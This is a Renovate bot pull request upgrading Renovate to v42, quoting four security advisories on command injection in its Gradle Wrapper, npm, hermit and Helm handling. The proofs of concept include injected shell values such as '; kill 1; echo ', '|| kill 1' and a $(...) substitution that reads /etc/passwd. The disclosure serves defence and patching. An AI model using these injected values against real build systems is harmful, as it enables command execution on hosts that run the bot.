chore(deps): update dependency renovate to v42 [security] #161

renovate · 2026-01-13T21:05:40Z

Note: This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
renovate (source)	`37.440.7` → `42.68.5`

GitHub Vulnerability Alerts

GHSA-pfq2-hh62-7m96

Summary

Renovate can be tricked into executing shell code while updating the Gradle Wrapper. A malicious distributionUrl in gradle/wrapper/gradle-wrapper.properties can lead to command execution in the Renovate runtime.

Details

When Renovate handles Gradle Wrapper artifacts, it may run a wrapper update command such as:

./gradlew :wrapper --gradle-distribution-url <value>

In the observed behavior, Renovate executes this via a shell (e.g., /bin/sh -c ...).
If distributionUrl contains shell command substitution syntax like $(...), the shell evaluates it before Gradle validates/parses the URL.

After that, Gradle attempts to parse the URL as a URI and fails with URISyntaxException, but the shell substitution has already executed.

This is reproducible even when allowScripts is disabled (default is OFF), because this execution happens as part of Gradle Wrapper artifact handling rather than “repository install scripts”.

Prerequisites / attack conditions:

The attacker must be able to get a malicious gradle-wrapper.properties into a repository that Renovate scans (e.g., direct write access, or a maintainer merges an attacker’s change/PR).
Renovate must be configured to process Gradle Wrapper updates/artifacts for that repository (default behavior for the Gradle Wrapper manager).

PoC

Create a repository with a Gradle Wrapper (gradlew, gradlew.bat, gradle/wrapper/gradle-wrapper.jar, and gradle/wrapper/gradle-wrapper.properties).
Set distributionUrl in gradle-wrapper.properties to include $(...).
Run Renovate against the repository.
Observe that a file is created during Renovate’s wrapper update step before Gradle fails with URISyntaxException.

A screen recording is attached showing end-to-end reproduction. In the demo, the payload creates /tmp/passwd_dump containing /etc/passwd, demonstrating that file read/exfiltration is possible within the Renovate execution context.

Impact

This allows arbitrary command execution in the Renovate runtime during Gradle Wrapper updates. Depending on deployment, this may expose credentials/tokens available to the bot and may allow an attacker to modify repositories or access internal resources reachable from the Renovate environment.

Remediation

Upgrading to Renovate 42.68.5 (2025-12-31) fixes this issue, and closes out other risks of shell evaluation for commands run by Renovate.

If using the composer, yarn (v1) or flux managers, please upgrade to 42.74.5 (2026-01-08), as there were follow-up fixes to keep these managers working.

GHSA-fr4j-65pv-gjjj

Summary

The user-provided string packageName in the npm manager is appended to the npm install command during lock maintenance without proper sanitization.

Details

Adversaries can provide a maliciously crafted Renovate configuration file to trick Renovate to execute arbitrary code.
The user-provided workspace names and package keys that are added to the updateCmd variables in lib/modules/manager/npm/post-update/npm.ts are not being escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 35.63.0 (renovatebot/renovate@012c0ac), released on April 27 of 2023.

PoC

Create a git repo with the following content:

renovate.json5:

{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"11.1.0"}]}'],
    },
  },
  packageRules: [
    {
      // Target of the day
      matchManagers: ["npm"],
      // Provide a command in the package name
      overridePackageName: "; kill 1; echo ",
      // Override the datasource to prevent a lookup failure
      overrideDatasource: "custom.always",
    },
  ],
}

package.json:

{
  "name": "renovate-aci-4",
  "version": "0.0.1",
  "dependencies": {
    "uuid": "^11.0.0"
  }
}

package-lock.json:

{
  "name": "renovate-aci-4",
  "version": "0.0.1",
  "lockfileVersion": 3,
  "requires": true,
  "packages": {
    "": {
      "name": "renovate-aci-4",
      "version": "0.0.1",
      "dependencies": {
        "uuid": "^11.0.0"
      }
    },
    "node_modules/uuid": {
      "version": "11.0.0",
      "resolved": "https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz",
      "integrity": "sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==",
      "funding": [
        "https://github.com/sponsors/broofa",
        "https://github.com/sponsors/ctavan"
      ],
      "license": "MIT",
      "bin": {
        "uuid": "dist/esm/bin/uuid"
      }
    }
  }
}

Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of kill 1, terminating the root process of the container.

Note

This specific proof of concept relies on the introduction of the overrideDatasource and overridePackageName configuration, available since version 38.120.0 (renovatebot/renovate@a70a6a3), released on October 12 of 2024.

Impact

This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

GHSA-36j9-mx87-2cff

Summary

The user-provided string depName in the hermit manager is appended to the ./hermit install and ./hermit uninstall commands without proper sanitization.

Details

Adversaries can provide a maliciously named hermit dependency in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.
All values added to the packagesToInstall and packagesToUninstall variables in lib/modules/manager/hermit/artifacts.ts are not being escaped using the quote function from the shlex package.
This lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (renovatebot/renovate@b696abb), released on July 30 of 2022.
In version 37.199.1 (renovatebot/renovate@eaec10d) some use of the quote function from the shlex package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.
When support for replacements was introduced with version 37.214.4 (renovatebot/renovate@41e8b99), the same faulty approach was replicated for uninstalling packages.

PoC

Create a git repo with the following content:

renovate.json5:

{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  packageRules: [
    {
      // Target of the day
      matchManagers: ["hermit"],
      // Trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

bin/hermit:

#!/bin/bash
#

# THIS FILE IS GENERATED; DO NOT MODIFY

set -eo pipefail

export HERMIT_USER_HOME=~

if [ -z "${HERMIT_STATE_DIR}" ]; then
  case "$(uname -s)" in
  Darwin)
    export HERMIT_STATE_DIR="${HERMIT_USER_HOME}/Library/Caches/hermit"
    ;;
  Linux)
    export HERMIT_STATE_DIR="${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit"
    ;;
  esac
fi

export HERMIT_DIST_URL="${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}"
HERMIT_CHANNEL="$(basename "${HERMIT_DIST_URL}")"
export HERMIT_CHANNEL
export HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}

if [ ! -x "${HERMIT_EXE}" ]; then
  echo "Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}" 1>&2
  INSTALL_SCRIPT="$(mktemp)"
  # This value must match that of the install script
  INSTALL_SCRIPT_SHA256="09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6"
  if [ "${INSTALL_SCRIPT_SHA256}" = "BYPASS" ]; then
    curl -fsSL "${HERMIT_DIST_URL}/install.sh" -o "${INSTALL_SCRIPT}"
  else
    # Install script is versioned by its sha256sum value
    curl -fsSL "${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh" -o "${INSTALL_SCRIPT}"
    # Verify install script's sha256sum
    openssl dgst -sha256 "${INSTALL_SCRIPT}" | \
      awk -v EXPECTED="$INSTALL_SCRIPT_SHA256" \
      '$2!=EXPECTED {print "Install script sha256 " $2 " does not match " EXPECTED; exit 1}'
  fi
  /bin/bash "${INSTALL_SCRIPT}" 1>&2
fi

exec "${HERMIT_EXE}" --level=fatal exec "$0" -- "$@&#8203;"

bin/.|| kill 1 ||@0.0.1.pkg (symlink):

A symlink to hermit

Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of kill 1, terminating the root process of the container.

Note

This specific proof of concept was made a lot simpler with the introduction of the overrideDatasource configuration since version 38.120.0 (renovatebot/renovate@a70a6a3), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.

Impact

TThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

GHSA-3f44-xw83-3pmg

Summary

The user-provided string repository in the helmv3 manager is appended to the helm registry login command without proper sanitization.

Details

Adversaries can provide a maliciously crafted Chart.yaml in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.
The value for both uses of the repository variable in lib/modules/manager/helmv3/common.ts are not being escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 31.51.0 (renovatebot/renovate@f372a68), released on January 24 of 2022.

PoC

Create a git repo with the following content:

renovate.json5:

{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  // Register any credentials to make the manager attempt to use basic auth for the Helm registry
  hostRules: [
    {
      matchHost: "charts.bitnami.com",
      username: "un",
      password: "pw",
    },
  ],
  packageRules: [
    {
      // Target of the day
      matchManagers: ["helmv3"],
      // Don't consult the actual bitnami repo
      registryUrls: [],
      // But still, trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

Chart.yaml:

apiVersion: v2
name: renovate-aci-1
version: 0.0.1
dependencies:
  - name: redis
    version: 0.1.0
    repository: oci://charts.bitnami.com/bitnami || kill 1

Chart.lock:

dependencies:
- name: redis
  repository: oci://charts.bitnami.com/bitnami

Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of kill 1, terminating the root process of the container.

Note

This specific proof of concept was made a lot simpler with the introduction of the overrideDatasource configuration since version 38.120.0 (renovatebot/renovate@a70a6a3), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.

Impact

This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

Release Notes

renovatebot/renovate (renovate)

chore(deps): update dependency renovate to v42 [security] #161

chore(deps): update dependency renovate to v42 [security] #161

Uh oh!

Conversation

renovate bot commented Jan 13, 2026

GitHub Vulnerability Alerts

Summary

Details

PoC

Impact

Remediation

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Release Notes

Bug Fixes

Documentation

Code Refactoring

Tests

Bug Fixes

Bug Fixes

Miscellaneous Chores

Bug Fixes

Bug Fixes

Miscellaneous Chores

Features

Miscellaneous Chores

Features

Documentation

Miscellaneous Chores

Code Refactoring

Bug Fixes

Bug Fixes

Miscellaneous Chores

Code Refactoring

Bug Fixes

Documentation

Miscellaneous Chores

Code Refactoring

Bug Fixes

Miscellaneous Chores

Bug Fixes

Build System

Bug Fixes

Miscellaneous Chores

Miscellaneous Chores

Build System

Build System

Build System

Build System

Bug Fixes

Bug Fixes

Miscellaneous Chores

Bug Fixes

Miscellaneous Chores

Bug Fixes

Build System

Features

Bug Fixes

Documentation

Miscellaneous Chores

Build System

Features

Code Refactoring

Features

Bug Fixes

Miscellaneous Chores

Features

Bug Fixes

Documentation

Features